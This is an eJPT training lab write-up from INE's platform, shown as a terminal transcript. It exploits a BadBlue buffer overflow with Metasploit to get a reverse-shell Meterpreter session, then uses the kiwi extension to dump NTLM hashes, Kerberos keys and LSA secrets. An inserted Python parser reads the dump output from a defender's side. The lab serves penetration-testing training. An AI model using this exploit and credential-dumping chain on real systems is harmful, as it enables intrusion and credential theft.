Lab Name: Windows Meterpreter Kiwi Extension
Platform: INE
Lab No: 16
Exam: eJPT (Jr. Penetration Tester)
┌──(root㉿attackdefense)-[~]
└─# ping -c 4 demo.ine.local
PING demo.ine.local (10.4.31.182) 56(84) bytes of data.
64 bytes from demo.ine.local (10.4.31.182): icmp_seq=1 ttl=125 time=18.8 ms
64 bytes from demo.ine.local (10.4.31.182): icmp_seq=2 ttl=125 time=8.47 ms
64 bytes from demo.ine.local (10.4.31.182): icmp_seq=3 ttl=125 time=8.44 ms
64 bytes from demo.ine.local (10.4.31.182): icmp_seq=4 ttl=125 time=23.7 ms
--- demo.ine.local ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3005ms
rtt min/avg/max/mdev = 8.435/14.866/23.732/6.646 ms
┌──(root㉿attackdefense)-[~]
└─# nmap demo.ine.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-28 02:29 IST
Nmap scan report for demo.ine.local (10.4.31.182)
Host is up (0.0092s latency).
Not shown: 995 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
Nmap done: 1 IP address (1 host up) scanned in 1.46 seconds
┌──(root㉿attackdefense)-[~]
└─# msfconsole -q
msf6 > search badblue
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/badblue_ext_overflow 2003-04-20 great Yes BadBlue 2.5 EXT.dll Buffer Overflow
1 exploit/windows/http/badblue_passthru 2007-12-10 great No BadBlue 2.72b PassThru Buffer Overflow
2 \_ target: BadBlue EE 2.7 Universal . . . .
3 \_ target: BadBlue 2.72b Universal . . . .
Interact with a module by name or index. For example info 3, use 3 or use exploit/windows/http/badblue_passthru
After interacting with a module you can manually set a TARGET with set TARGET 'BadBlue 2.72b Universal'
msf6 > use 1
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/badblue_passthru) > set RHOST demo.ine.local
RHOST => demo.ine.local
msf6 exploit(windows/http/badblue_passthru) > exploit
[*] Started reverse TCP handler on 10.10.42.3:4444
[*] Trying target BadBlue EE 2.7 Universal...
[*] Sending stage (176198 bytes) to 10.4.31.182
[*] Meterpreter session 1 opened (10.10.42.3:4444 -> 10.4.31.182:49911) at 2024-08-28 02:30:27 +0530
meterpreter > sysinfo
Computer : ATTACKDEFENSE
OS : Windows Server 2019 (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter > load kiwi
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain NTLM SHA1
-------- ------ ---- ----
Administrator ATTACKDEFENSE e3c61a68f1b89ee6c8ba9507378dc88d fa62275e30d286c09d30d8fece82664eb34323ef
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
ATTACKDEFENSE$ WORKGROUP (null)
Administrator ATTACKDEFENSE (null)
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator ATTACKDEFENSE (null)
attackdefense$ WORKGROUP (null)
meterpreter > lsa_dump_sam
[+] Running as SYSTEM
[*] Dumping SAM
Domain : ATTACKDEFENSE
SysKey : 377af0de68bdc918d22c57a263d38326
Local SID : S-1-5-21-3688751335-3073641799-161370460
SAMKey : 858f5bda5c99e45094a6a1387241a33d
RID : 000001f4 (500)
User : Administrator
Hash NTLM: e3c61a68f1b89ee6c8ba9507378dc88d
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : ed1f5e64aad3727f03522bbddc080d77
* Primary:Kerberos-Newer-Keys *
Default Salt : ATTACKDEFENSEAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : f566d48c0c62f88d997e9e56b52eed1696aead09df3100982bcfc5920655da5d
aes128_hmac (4096) : bf0ca9e206e82ce481c818070bef0855
des_cbc_md5 (4096) : 6d570d08df8979fe
OldCredentials
aes256_hmac (4096) : 69d101a02f3f4648bf9875f10c1cd268d3f500c3253ab862222a9e1bb3740247
aes128_hmac (4096) : 3c3fd899f7f004ed44e9e48f868a5ddc
des_cbc_md5 (4096) : 9b808fb9e0cbb3b5
OlderCredentials
aes256_hmac (4096) : 4cbbe8ad8482ca76952b08cd9103ba91af35c9d8b21a3d49c332e072618a9fa9
aes128_hmac (4096) : b18addd75f8a2b106b262c7b5e517623
des_cbc_md5 (4096) : 7fe0c2a15eb32fcd
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : ATTACKDEFENSEAdministrator
Credentials
des_cbc_md5 : 6d570d08df8979fe
OldCredentials
des_cbc_md5 : 9b808fb9e0cbb3b5
RID : 000001f5 (501)
User : Guest
RID : 000001f7 (503)
User : DefaultAccount
RID : 000001f8 (504)
User : WDAGUtilityAccount
Hash NTLM: 58f8e0214224aebc2c5f82fb7cb47ca1
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : a1528cd40d99e5dfa9fa0809af998696
* Primary:Kerberos-Newer-Keys *
Default Salt : WDAGUtilityAccount
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 3ff137e53cac32e3e3857dc89b725fd62ae4eee729c1c5c077e54e5882d8bd55
aes128_hmac (4096) : 15ac5054635c97d02c174ee3aa672227
des_cbc_md5 (4096) : ce9b2cabd55df4ce
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : WDAGUtilityAccount
Credentials
des_cbc_md5 : ce9b2cabd55df4ce
RID : 000003f0 (1008)
User : student
Hash NTLM: bd4ca1fbe028f3c5066467a7f6a73b0b
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : b8e5edf45f3a42335f1f4906a24a08fe
* Primary:Kerberos-Newer-Keys *
Default Salt : EC2AMAZ-R69684Tstudent
Default Iterations : 4096
Credentials
aes256_hmac (4096) : bab064fdaf62216a1577f1d5cd88e162f6962b4a421d199adf4c66b61ec6ac7c
aes128_hmac (4096) : 42bc1d17d1236d3afc09efbeba547d2c
des_cbc_md5 (4096) : 1a975b02a7bf15d5
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : EC2AMAZ-R69684Tstudent
Credentials
des_cbc_md5 : 1a975b02a7bf15d5
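Added example (not part of the INE lab and not code from the kiwi/mimikatz project): a small Python parser for the lsa_dump_sam output above, written from the responder's side. When a session log like this one turns up during an investigation, the parser tells you which local accounts had an NTLM hash or Kerberos key exposed and therefore must be reset, and which accounts still carry a single-DES des_cbc_md5 key. The sample dump embedded in the block is a trimmed copy of the Administrator, Guest and student blocks from this lab's output; the line-format rules (RID, User, Hash NTLM and Credentials markers) are assumptions taken from that output, and the helper names are my own.

```python
from __future__ import annotations
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample: a trimmed copy of the lab's lsa_dump_sam output above.
SAMPLE_DUMP = """\
[+] Running as SYSTEM
[*] Dumping SAM
Domain : ATTACKDEFENSE
SysKey : 377af0de68bdc918d22c57a263d38326
Local SID : S-1-5-21-3688751335-3073641799-161370460
RID : 000001f4 (500)
User : Administrator
Hash NTLM: e3c61a68f1b89ee6c8ba9507378dc88d
Supplemental Credentials:
* Primary:Kerberos-Newer-Keys *
Default Salt : ATTACKDEFENSEAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : f566d48c0c62f88d997e9e56b52eed1696aead09df3100982bcfc5920655da5d
aes128_hmac (4096) : bf0ca9e206e82ce481c818070bef0855
des_cbc_md5 (4096) : 6d570d08df8979fe
OldCredentials
aes256_hmac (4096) : 69d101a02f3f4648bf9875f10c1cd268d3f500c3253ab862222a9e1bb3740247
RID : 000001f5 (501)
User : Guest
RID : 000003f0 (1008)
User : student
Hash NTLM: bd4ca1fbe028f3c5066467a7f6a73b0b
Supplemental Credentials:
* Primary:Kerberos *
Default Salt : EC2AMAZ-R69684Tstudent
Credentials
des_cbc_md5 : 1a975b02a7bf15d5
"""

@dataclass
class SamAccount:
    rid: int
    user: str
    ntlm: Optional[str] = None
    kerberos_keys: List[str] = field(default_factory=list)  # current keys only

    @property
    def credential_exposed(self) -> bool:
        # Any stored secret in the dump means the account needs a reset.
        return self.ntlm is not None or bool(self.kerberos_keys)

# Line patterns assumed from the kiwi output format shown in this lab.
RID_RE = re.compile(r"^RID\s*:\s*[0-9a-f]+\s*\((\d+)\)")
USER_RE = re.compile(r"^User\s*:\s*(\S+)")
NTLM_RE = re.compile(r"^Hash NTLM:\s*([0-9a-f]{32})")
KEY_RE = re.compile(r"^(aes256_hmac|aes128_hmac|des_cbc_md5)\b")
SECTIONS = ("Credentials", "OldCredentials", "OlderCredentials")

def parse_sam_dump(text: str) -> List[SamAccount]:
    """Walk the dump line by line; a RID line followed by a User line opens an account."""
    accounts: List[SamAccount] = []
    current: Optional[SamAccount] = None
    section: Optional[str] = None   # which key list we are inside, if any
    pending_rid: Optional[int] = None
    for raw in text.splitlines():
        line = raw.strip()
        m = RID_RE.match(line)
        if m:
            pending_rid, section = int(m.group(1)), None
            continue
        m = USER_RE.match(line)
        if m and pending_rid is not None:
            current = SamAccount(rid=pending_rid, user=m.group(1))
            accounts.append(current)
            pending_rid = None
            continue
        if current is None:
            continue
        m = NTLM_RE.match(line)
        if m:
            current.ntlm = m.group(1)
            continue
        if line in SECTIONS:
            section = line
            continue
        m = KEY_RE.match(line)
        # Only current keys matter for scoping; Old/Older lists are already rotated.
        if m and section == "Credentials" and m.group(1) not in current.kerberos_keys:
            current.kerberos_keys.append(m.group(1))
    return accounts

def accounts_to_reset(accounts: List[SamAccount]) -> List[str]:
    """Accounts whose stored credential material appeared in the dump."""
    return [a.user for a in accounts if a.credential_exposed]

def legacy_key_accounts(accounts: List[SamAccount]) -> List[str]:
    """Accounts still holding a single-DES Kerberos key (des_cbc_md5)."""
    return [a.user for a in accounts if "des_cbc_md5" in a.kerberos_keys]

if __name__ == "__main__":
    parsed = parse_sam_dump(SAMPLE_DUMP)
    for acct in parsed:
        print(f"RID {acct.rid:<5} {acct.user:<18} ntlm={'yes' if acct.ntlm else 'no':<3} keys={acct.kerberos_keys}")
    print("reset:", accounts_to_reset(parsed))
    print("legacy DES keys:", legacy_key_accounts(parsed))
```

On the lab output, Administrator (RID 500) and student come back as accounts to reset, Guest does not, and both hashed accounts are flagged for the des_cbc_md5 key. The same parser can be pointed at a full dump captured from a real incident to produce the reset list for the host.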
meterpreter > lsa_dump_secrets
[+] Running as SYSTEM
[*] Dumping LSA secrets
Domain : ATTACKDEFENSE
SysKey : 377af0de68bdc918d22c57a263d38326
Local name : ATTACKDEFENSE ( S-1-5-21-3688751335-3073641799-161370460 )
Domain name : WORKGROUP
Policy subsystem is : 1.18
LSA Key(s) : 1, default {47980b9c-8bd1-89c9-bfb5-0c4fca25e625}
[00] {47980b9c-8bd1-89c9-bfb5-0c4fca25e625} 247e7be223db5e50291fc0fcec276ff8236c32a8a6183c5a0d0b6b044590ce06
Secret : DPAPI_SYSTEM
cur/hex : 01 00 00 00 34 5e 65 80 f9 04 a4 8c a5 0e 6c 74 6c d2 c3 b8 8e 7a ca c3 a3 3b 0e 6e 0a 64 f3 12 fc c7 92 67 a3 2f d5 d1 e4 41 33 ac
full: 345e6580f904a48ca50e6c746cd2c3b88e7acac3a33b0e6e0a64f312fcc79267a32fd5d1e44133ac
m/u : 345e6580f904a48ca50e6c746cd2c3b88e7acac3 / a33b0e6e0a64f312fcc79267a32fd5d1e44133ac
old/hex : 01 00 00 00 c1 3a 28 e3 94 7b 64 5d 94 29 b4 c9 1c 9b 0c b1 b6 5a aa 2c 34 4d ee ed 86 74 0f 12 25 37 8c 38 69 b3 b4 53 b6 37 86 44
full: c13a28e3947b645d9429b4c91c9b0cb1b65aaa2c344deeed86740f1225378c3869b3b453b6378644
m/u : c13a28e3947b645d9429b4c91c9b0cb1b65aaa2c / 344deeed86740f1225378c3869b3b453b6378644
Secret : NL$KM
cur/hex : 8d d2 8e 67 54 58 89 b1 c9 53 b9 5b 46 a2 b3 66 d4 3b 95 80 92 7d 67 78 b7 1d f9 2d a5 55 b7 a3 61 aa 4d 86 95 85 43 86 e3 12 9e c4 91 cf 9a 5b d8 bb 0d ae fa d3 41 e0 d8 66 3d 19 75 a2 d1 b2
old/hex : 8d d2 8e 67 54 58 89 b1 c9 53 b9 5b 46 a2 b3 66 d4 3b 95 80 92 7d 67 78 b7 1d f9 2d a5 55 b7 a3 61 aa 4d 86 95 85 43 86 e3 12 9e c4 91 cf 9a 5b d8 bb 0d ae fa d3 41 e0 d8 66 3d 19 75 a2 d1 b2